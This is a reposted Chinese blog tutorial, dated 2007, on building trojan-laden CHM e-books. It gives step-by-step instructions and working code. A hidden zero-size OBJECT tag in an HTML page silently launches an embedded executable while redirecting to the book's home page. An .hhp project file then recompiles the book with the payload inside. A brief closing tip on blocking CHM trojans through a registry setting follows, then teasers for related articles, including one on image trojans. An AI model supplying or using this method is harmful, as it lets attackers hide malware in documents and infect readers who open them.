CHM电子书木马制作全攻略

转载 2007年09月21日 21:48:00
说起CHM格式的电子书,可能无人不晓。有很大一部分电子图书都是使用CHM格式编译的。由于木马程序嵌入了电子书中,杀毒软件无法对其中存在的病毒等破坏性程序进行检查和清除。想知道这类电子书的制作方法吗?今天笔者就以实例形式和大家一道分析一下。
  Step1:要想制作一个完美的CHM木马,当然少不了电子书的制作工具。在这里我们选择微软自家的Microsoft HTML Help Workshop。
  当然了,作为木马程序的载体,一本CHM电子书是少不了的。本文演示所采用的是系统帮助文件中现成的windows.chm。
 
  Step2:首先运行windows.chm,在右侧的空白处点击右键菜单,进入"属性"页。记录下该电子文档的默认主页default.htm和标题栏文字Windows 2000两项信息。
 
  Step3:接下来需要制作一个可以让木马运行并且同时可以自动跳转到windows.chm默认主页的网页,例如cytkk.htm,源代码如下:
<HTML>
<HEAD>
<meta http-equiv="refresh" content="3;url='default.htm'">
</HEAD>
<BODY>
<OBJECT Width=0 Height=0 style="display:none;" TYPE="application/x-oleobje
ct" CODEBASE="灰色按钮克星.exe">
</OBJECT>
</BODY>
</HTML>
 
  代码注释:
  content="3是转向时间(单位为秒),可以根据木马程序的运行时间自行修改,建议不要超过5秒。其中的default.htm可以改为你用的电子书的默认主页名,灰色按钮克星.exe为木马程序名,你可以根据情况更改。
 
  Step4:运行HTML Help Workshop,选择文件菜单下的反编译项。接下来在反编译后的目录中可以看到windows.hhc(对应帮助文档左侧的"目录"项)和windows.hhk(对应帮助文档左侧的"索引"项)。
 
  Step5:现在要做的就是把木马程序复制到反编译后的目录中(本文中以插入灰色按钮克星.exe这款小软件为例),并在此目录下建立一个例如文件名为cytkk.hhp的文件(用记事本即可),代码如下:
[OPTIONS]
Compatibility=1.1 or later
Compiled file=windows.chm
Default Window=Main
Language=0x804 中文(中国)
[WINDOWS]
Main="Windows 2000","windows.hhc","windows.hhk","cytkk.htm",,,,,,0x420,150,0x104E,,0x0,0x0,,,,,0
[FILES]
cytkk.htm
 
  灰色按钮克星.exe
  代码注释:
  windows.chm可以改为你要生成的电子书名,而灰色按钮克星.exe则把它改为要嵌入的木马程序名,Main=后面改为在第一步时你得到的标题栏文字,windows.hhc及windows.hhk分别改为第三步得到的文件名。
 
  最后用HTML Help Workshop打开cytkk.hhp,点击"文件"→"编译",待提示完成后,就可以在目标目录中发现已经编译好的带有木马的电子书windows.chm了。
 
  高手传经:防之有道
  我们不可能对下载的每本书都进行反编译工作来加以检查,那是会累死人的。笔者建议大家在下载电子书籍时,尽量去知名网站下载。
       另外读者朋友们也可以修改本地安全属性,使CHM木马无法在本地运行木马程序,将注册表"HKEY_CURRENT_U
SER/Software/Microsoft/Windows/Current
Version/Internet Settings/Zones/0"下的1004项的值由原来十进制的0改为十六进制的3 

黑客技术 详解电子书(CHM)木马病毒

电子书木马(以下所指的电子书均指CHM格式的电子书)?其实这种方式的木马传播方法很早就有出现,但好象是多以网页木马的形式存在的,也就是把所谓的一个网页木马加入电子书里,这种效果和一般的网页木马的效果一...
  • Penlee
  • Penlee
  • 2007年07月17日 19:33
  • 832

CHM木马(简单高效)

这是现在网上比较普遍的一种中马方法,主要就是利用CHM可以将可执行文件包含其中,并且利用简单的html就可以让程序自动运行,制作方法非常简单,主要就是木马的选择,由于不知道对方机器上是否用了杀毒软件,...
  • AchillesA
  • AchillesA
  • 2004年11月13日 15:27
  • 2088

利用MetaProducts Inquiry 制作离线版网页chm电子书

转自:http://blog.csdn.net/akof1314/article/details/4553319 系统环境:windows 7 软件环境:MetaProducts Inquir...
  • wu5101608
  • wu5101608
  • 2014年04月03日 00:20
  • 1696

关于chm电子书无法显示网页的解决方法

从网上下载的chm电子书,常常会出现页面无法显示 的情况,在网上搜索了之后发现,很多人的解决方法都是修改注册表。经过实验后,我发现了一个简单的解决办法对于网上下载的chm,打开时会出现“您要打开此文件...
  • whotmmd
  • whotmmd
  • 2007年11月08日 10:22
  • 7103

危险的CHM电子书

0x1 摘要: 利用CHM格式文件的hhctrl控件的灵活易用性,可以成功执行任意可执行程序,而且没有UAC报警,CHM格式就变成了一个具有潜在威胁的EXE程序.因此黑客很容易利用这种帮助文档执行恶...
  • chenchen0708
  • chenchen0708
  • 2015年03月16日 08:39
  • 1591

正在制作chm电子书

由于2009年10月1日实施了新的保险法,我们公司的保险条款也发生了变化,为了使用上更方便我一开始在word文档里做了个超链接的目录,发给了各营销部内勤,但效果不是很好,之后决定做个电子书什么,因为经...
  • gl80hou
  • gl80hou
  • 2009年10月19日 13:04
  • 337

Sphinx制作htmlhelp手册文档(Manual-chm)

Microsoft的.chm文件格式作为手头工具手册Manual,那是相当的好用。Sphinx可直接生成文档手册,现将简要步骤记录...
  • qq_33207239
  • qq_33207239
  • 2017年05月04日 10:19
  • 366

图片木马制作的三种方法

1.Copy命令制作 1.asp内容: 打开cmd,数据一下命令: 此时打开两个jpg文件,相比: 且打开2.jpg可以像1.j...
  • whatday
  • whatday
  • 2017年01月25日 21:36
  • 8096

当心!浏览网页也会中木马

当心!浏览网页也会中木马2001-08-23 10:17:35· ·小蓉··yesky1 2 3 4 5  下一页  如果我对你说浏览网页也会感染木马,你相信吗?  其实,这已经不是相信不相信的问题了...
  • 8080
  • 8080
  • 2001年08月24日 08:54
  • 1486

chm格式电子书另类反编译法:使用压缩软件7Z简单实现CHM电子书反编译 | 志文工作室

转自 chm格式电子书相信很多人都比较熟悉了,当然这种格式优点很多。有时候我们看着制作精美的chm电子书,希望里面的图片或是资料提取出来,这时候大家可能首先想到的就是把它反编译。如此...
  • lessconcern
  • lessconcern
  • 2014年07月15日 15:38
  • 2157
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:CHM电子书木马制作全攻略
举报原因:
原因补充:

(最多只允许输入30个字)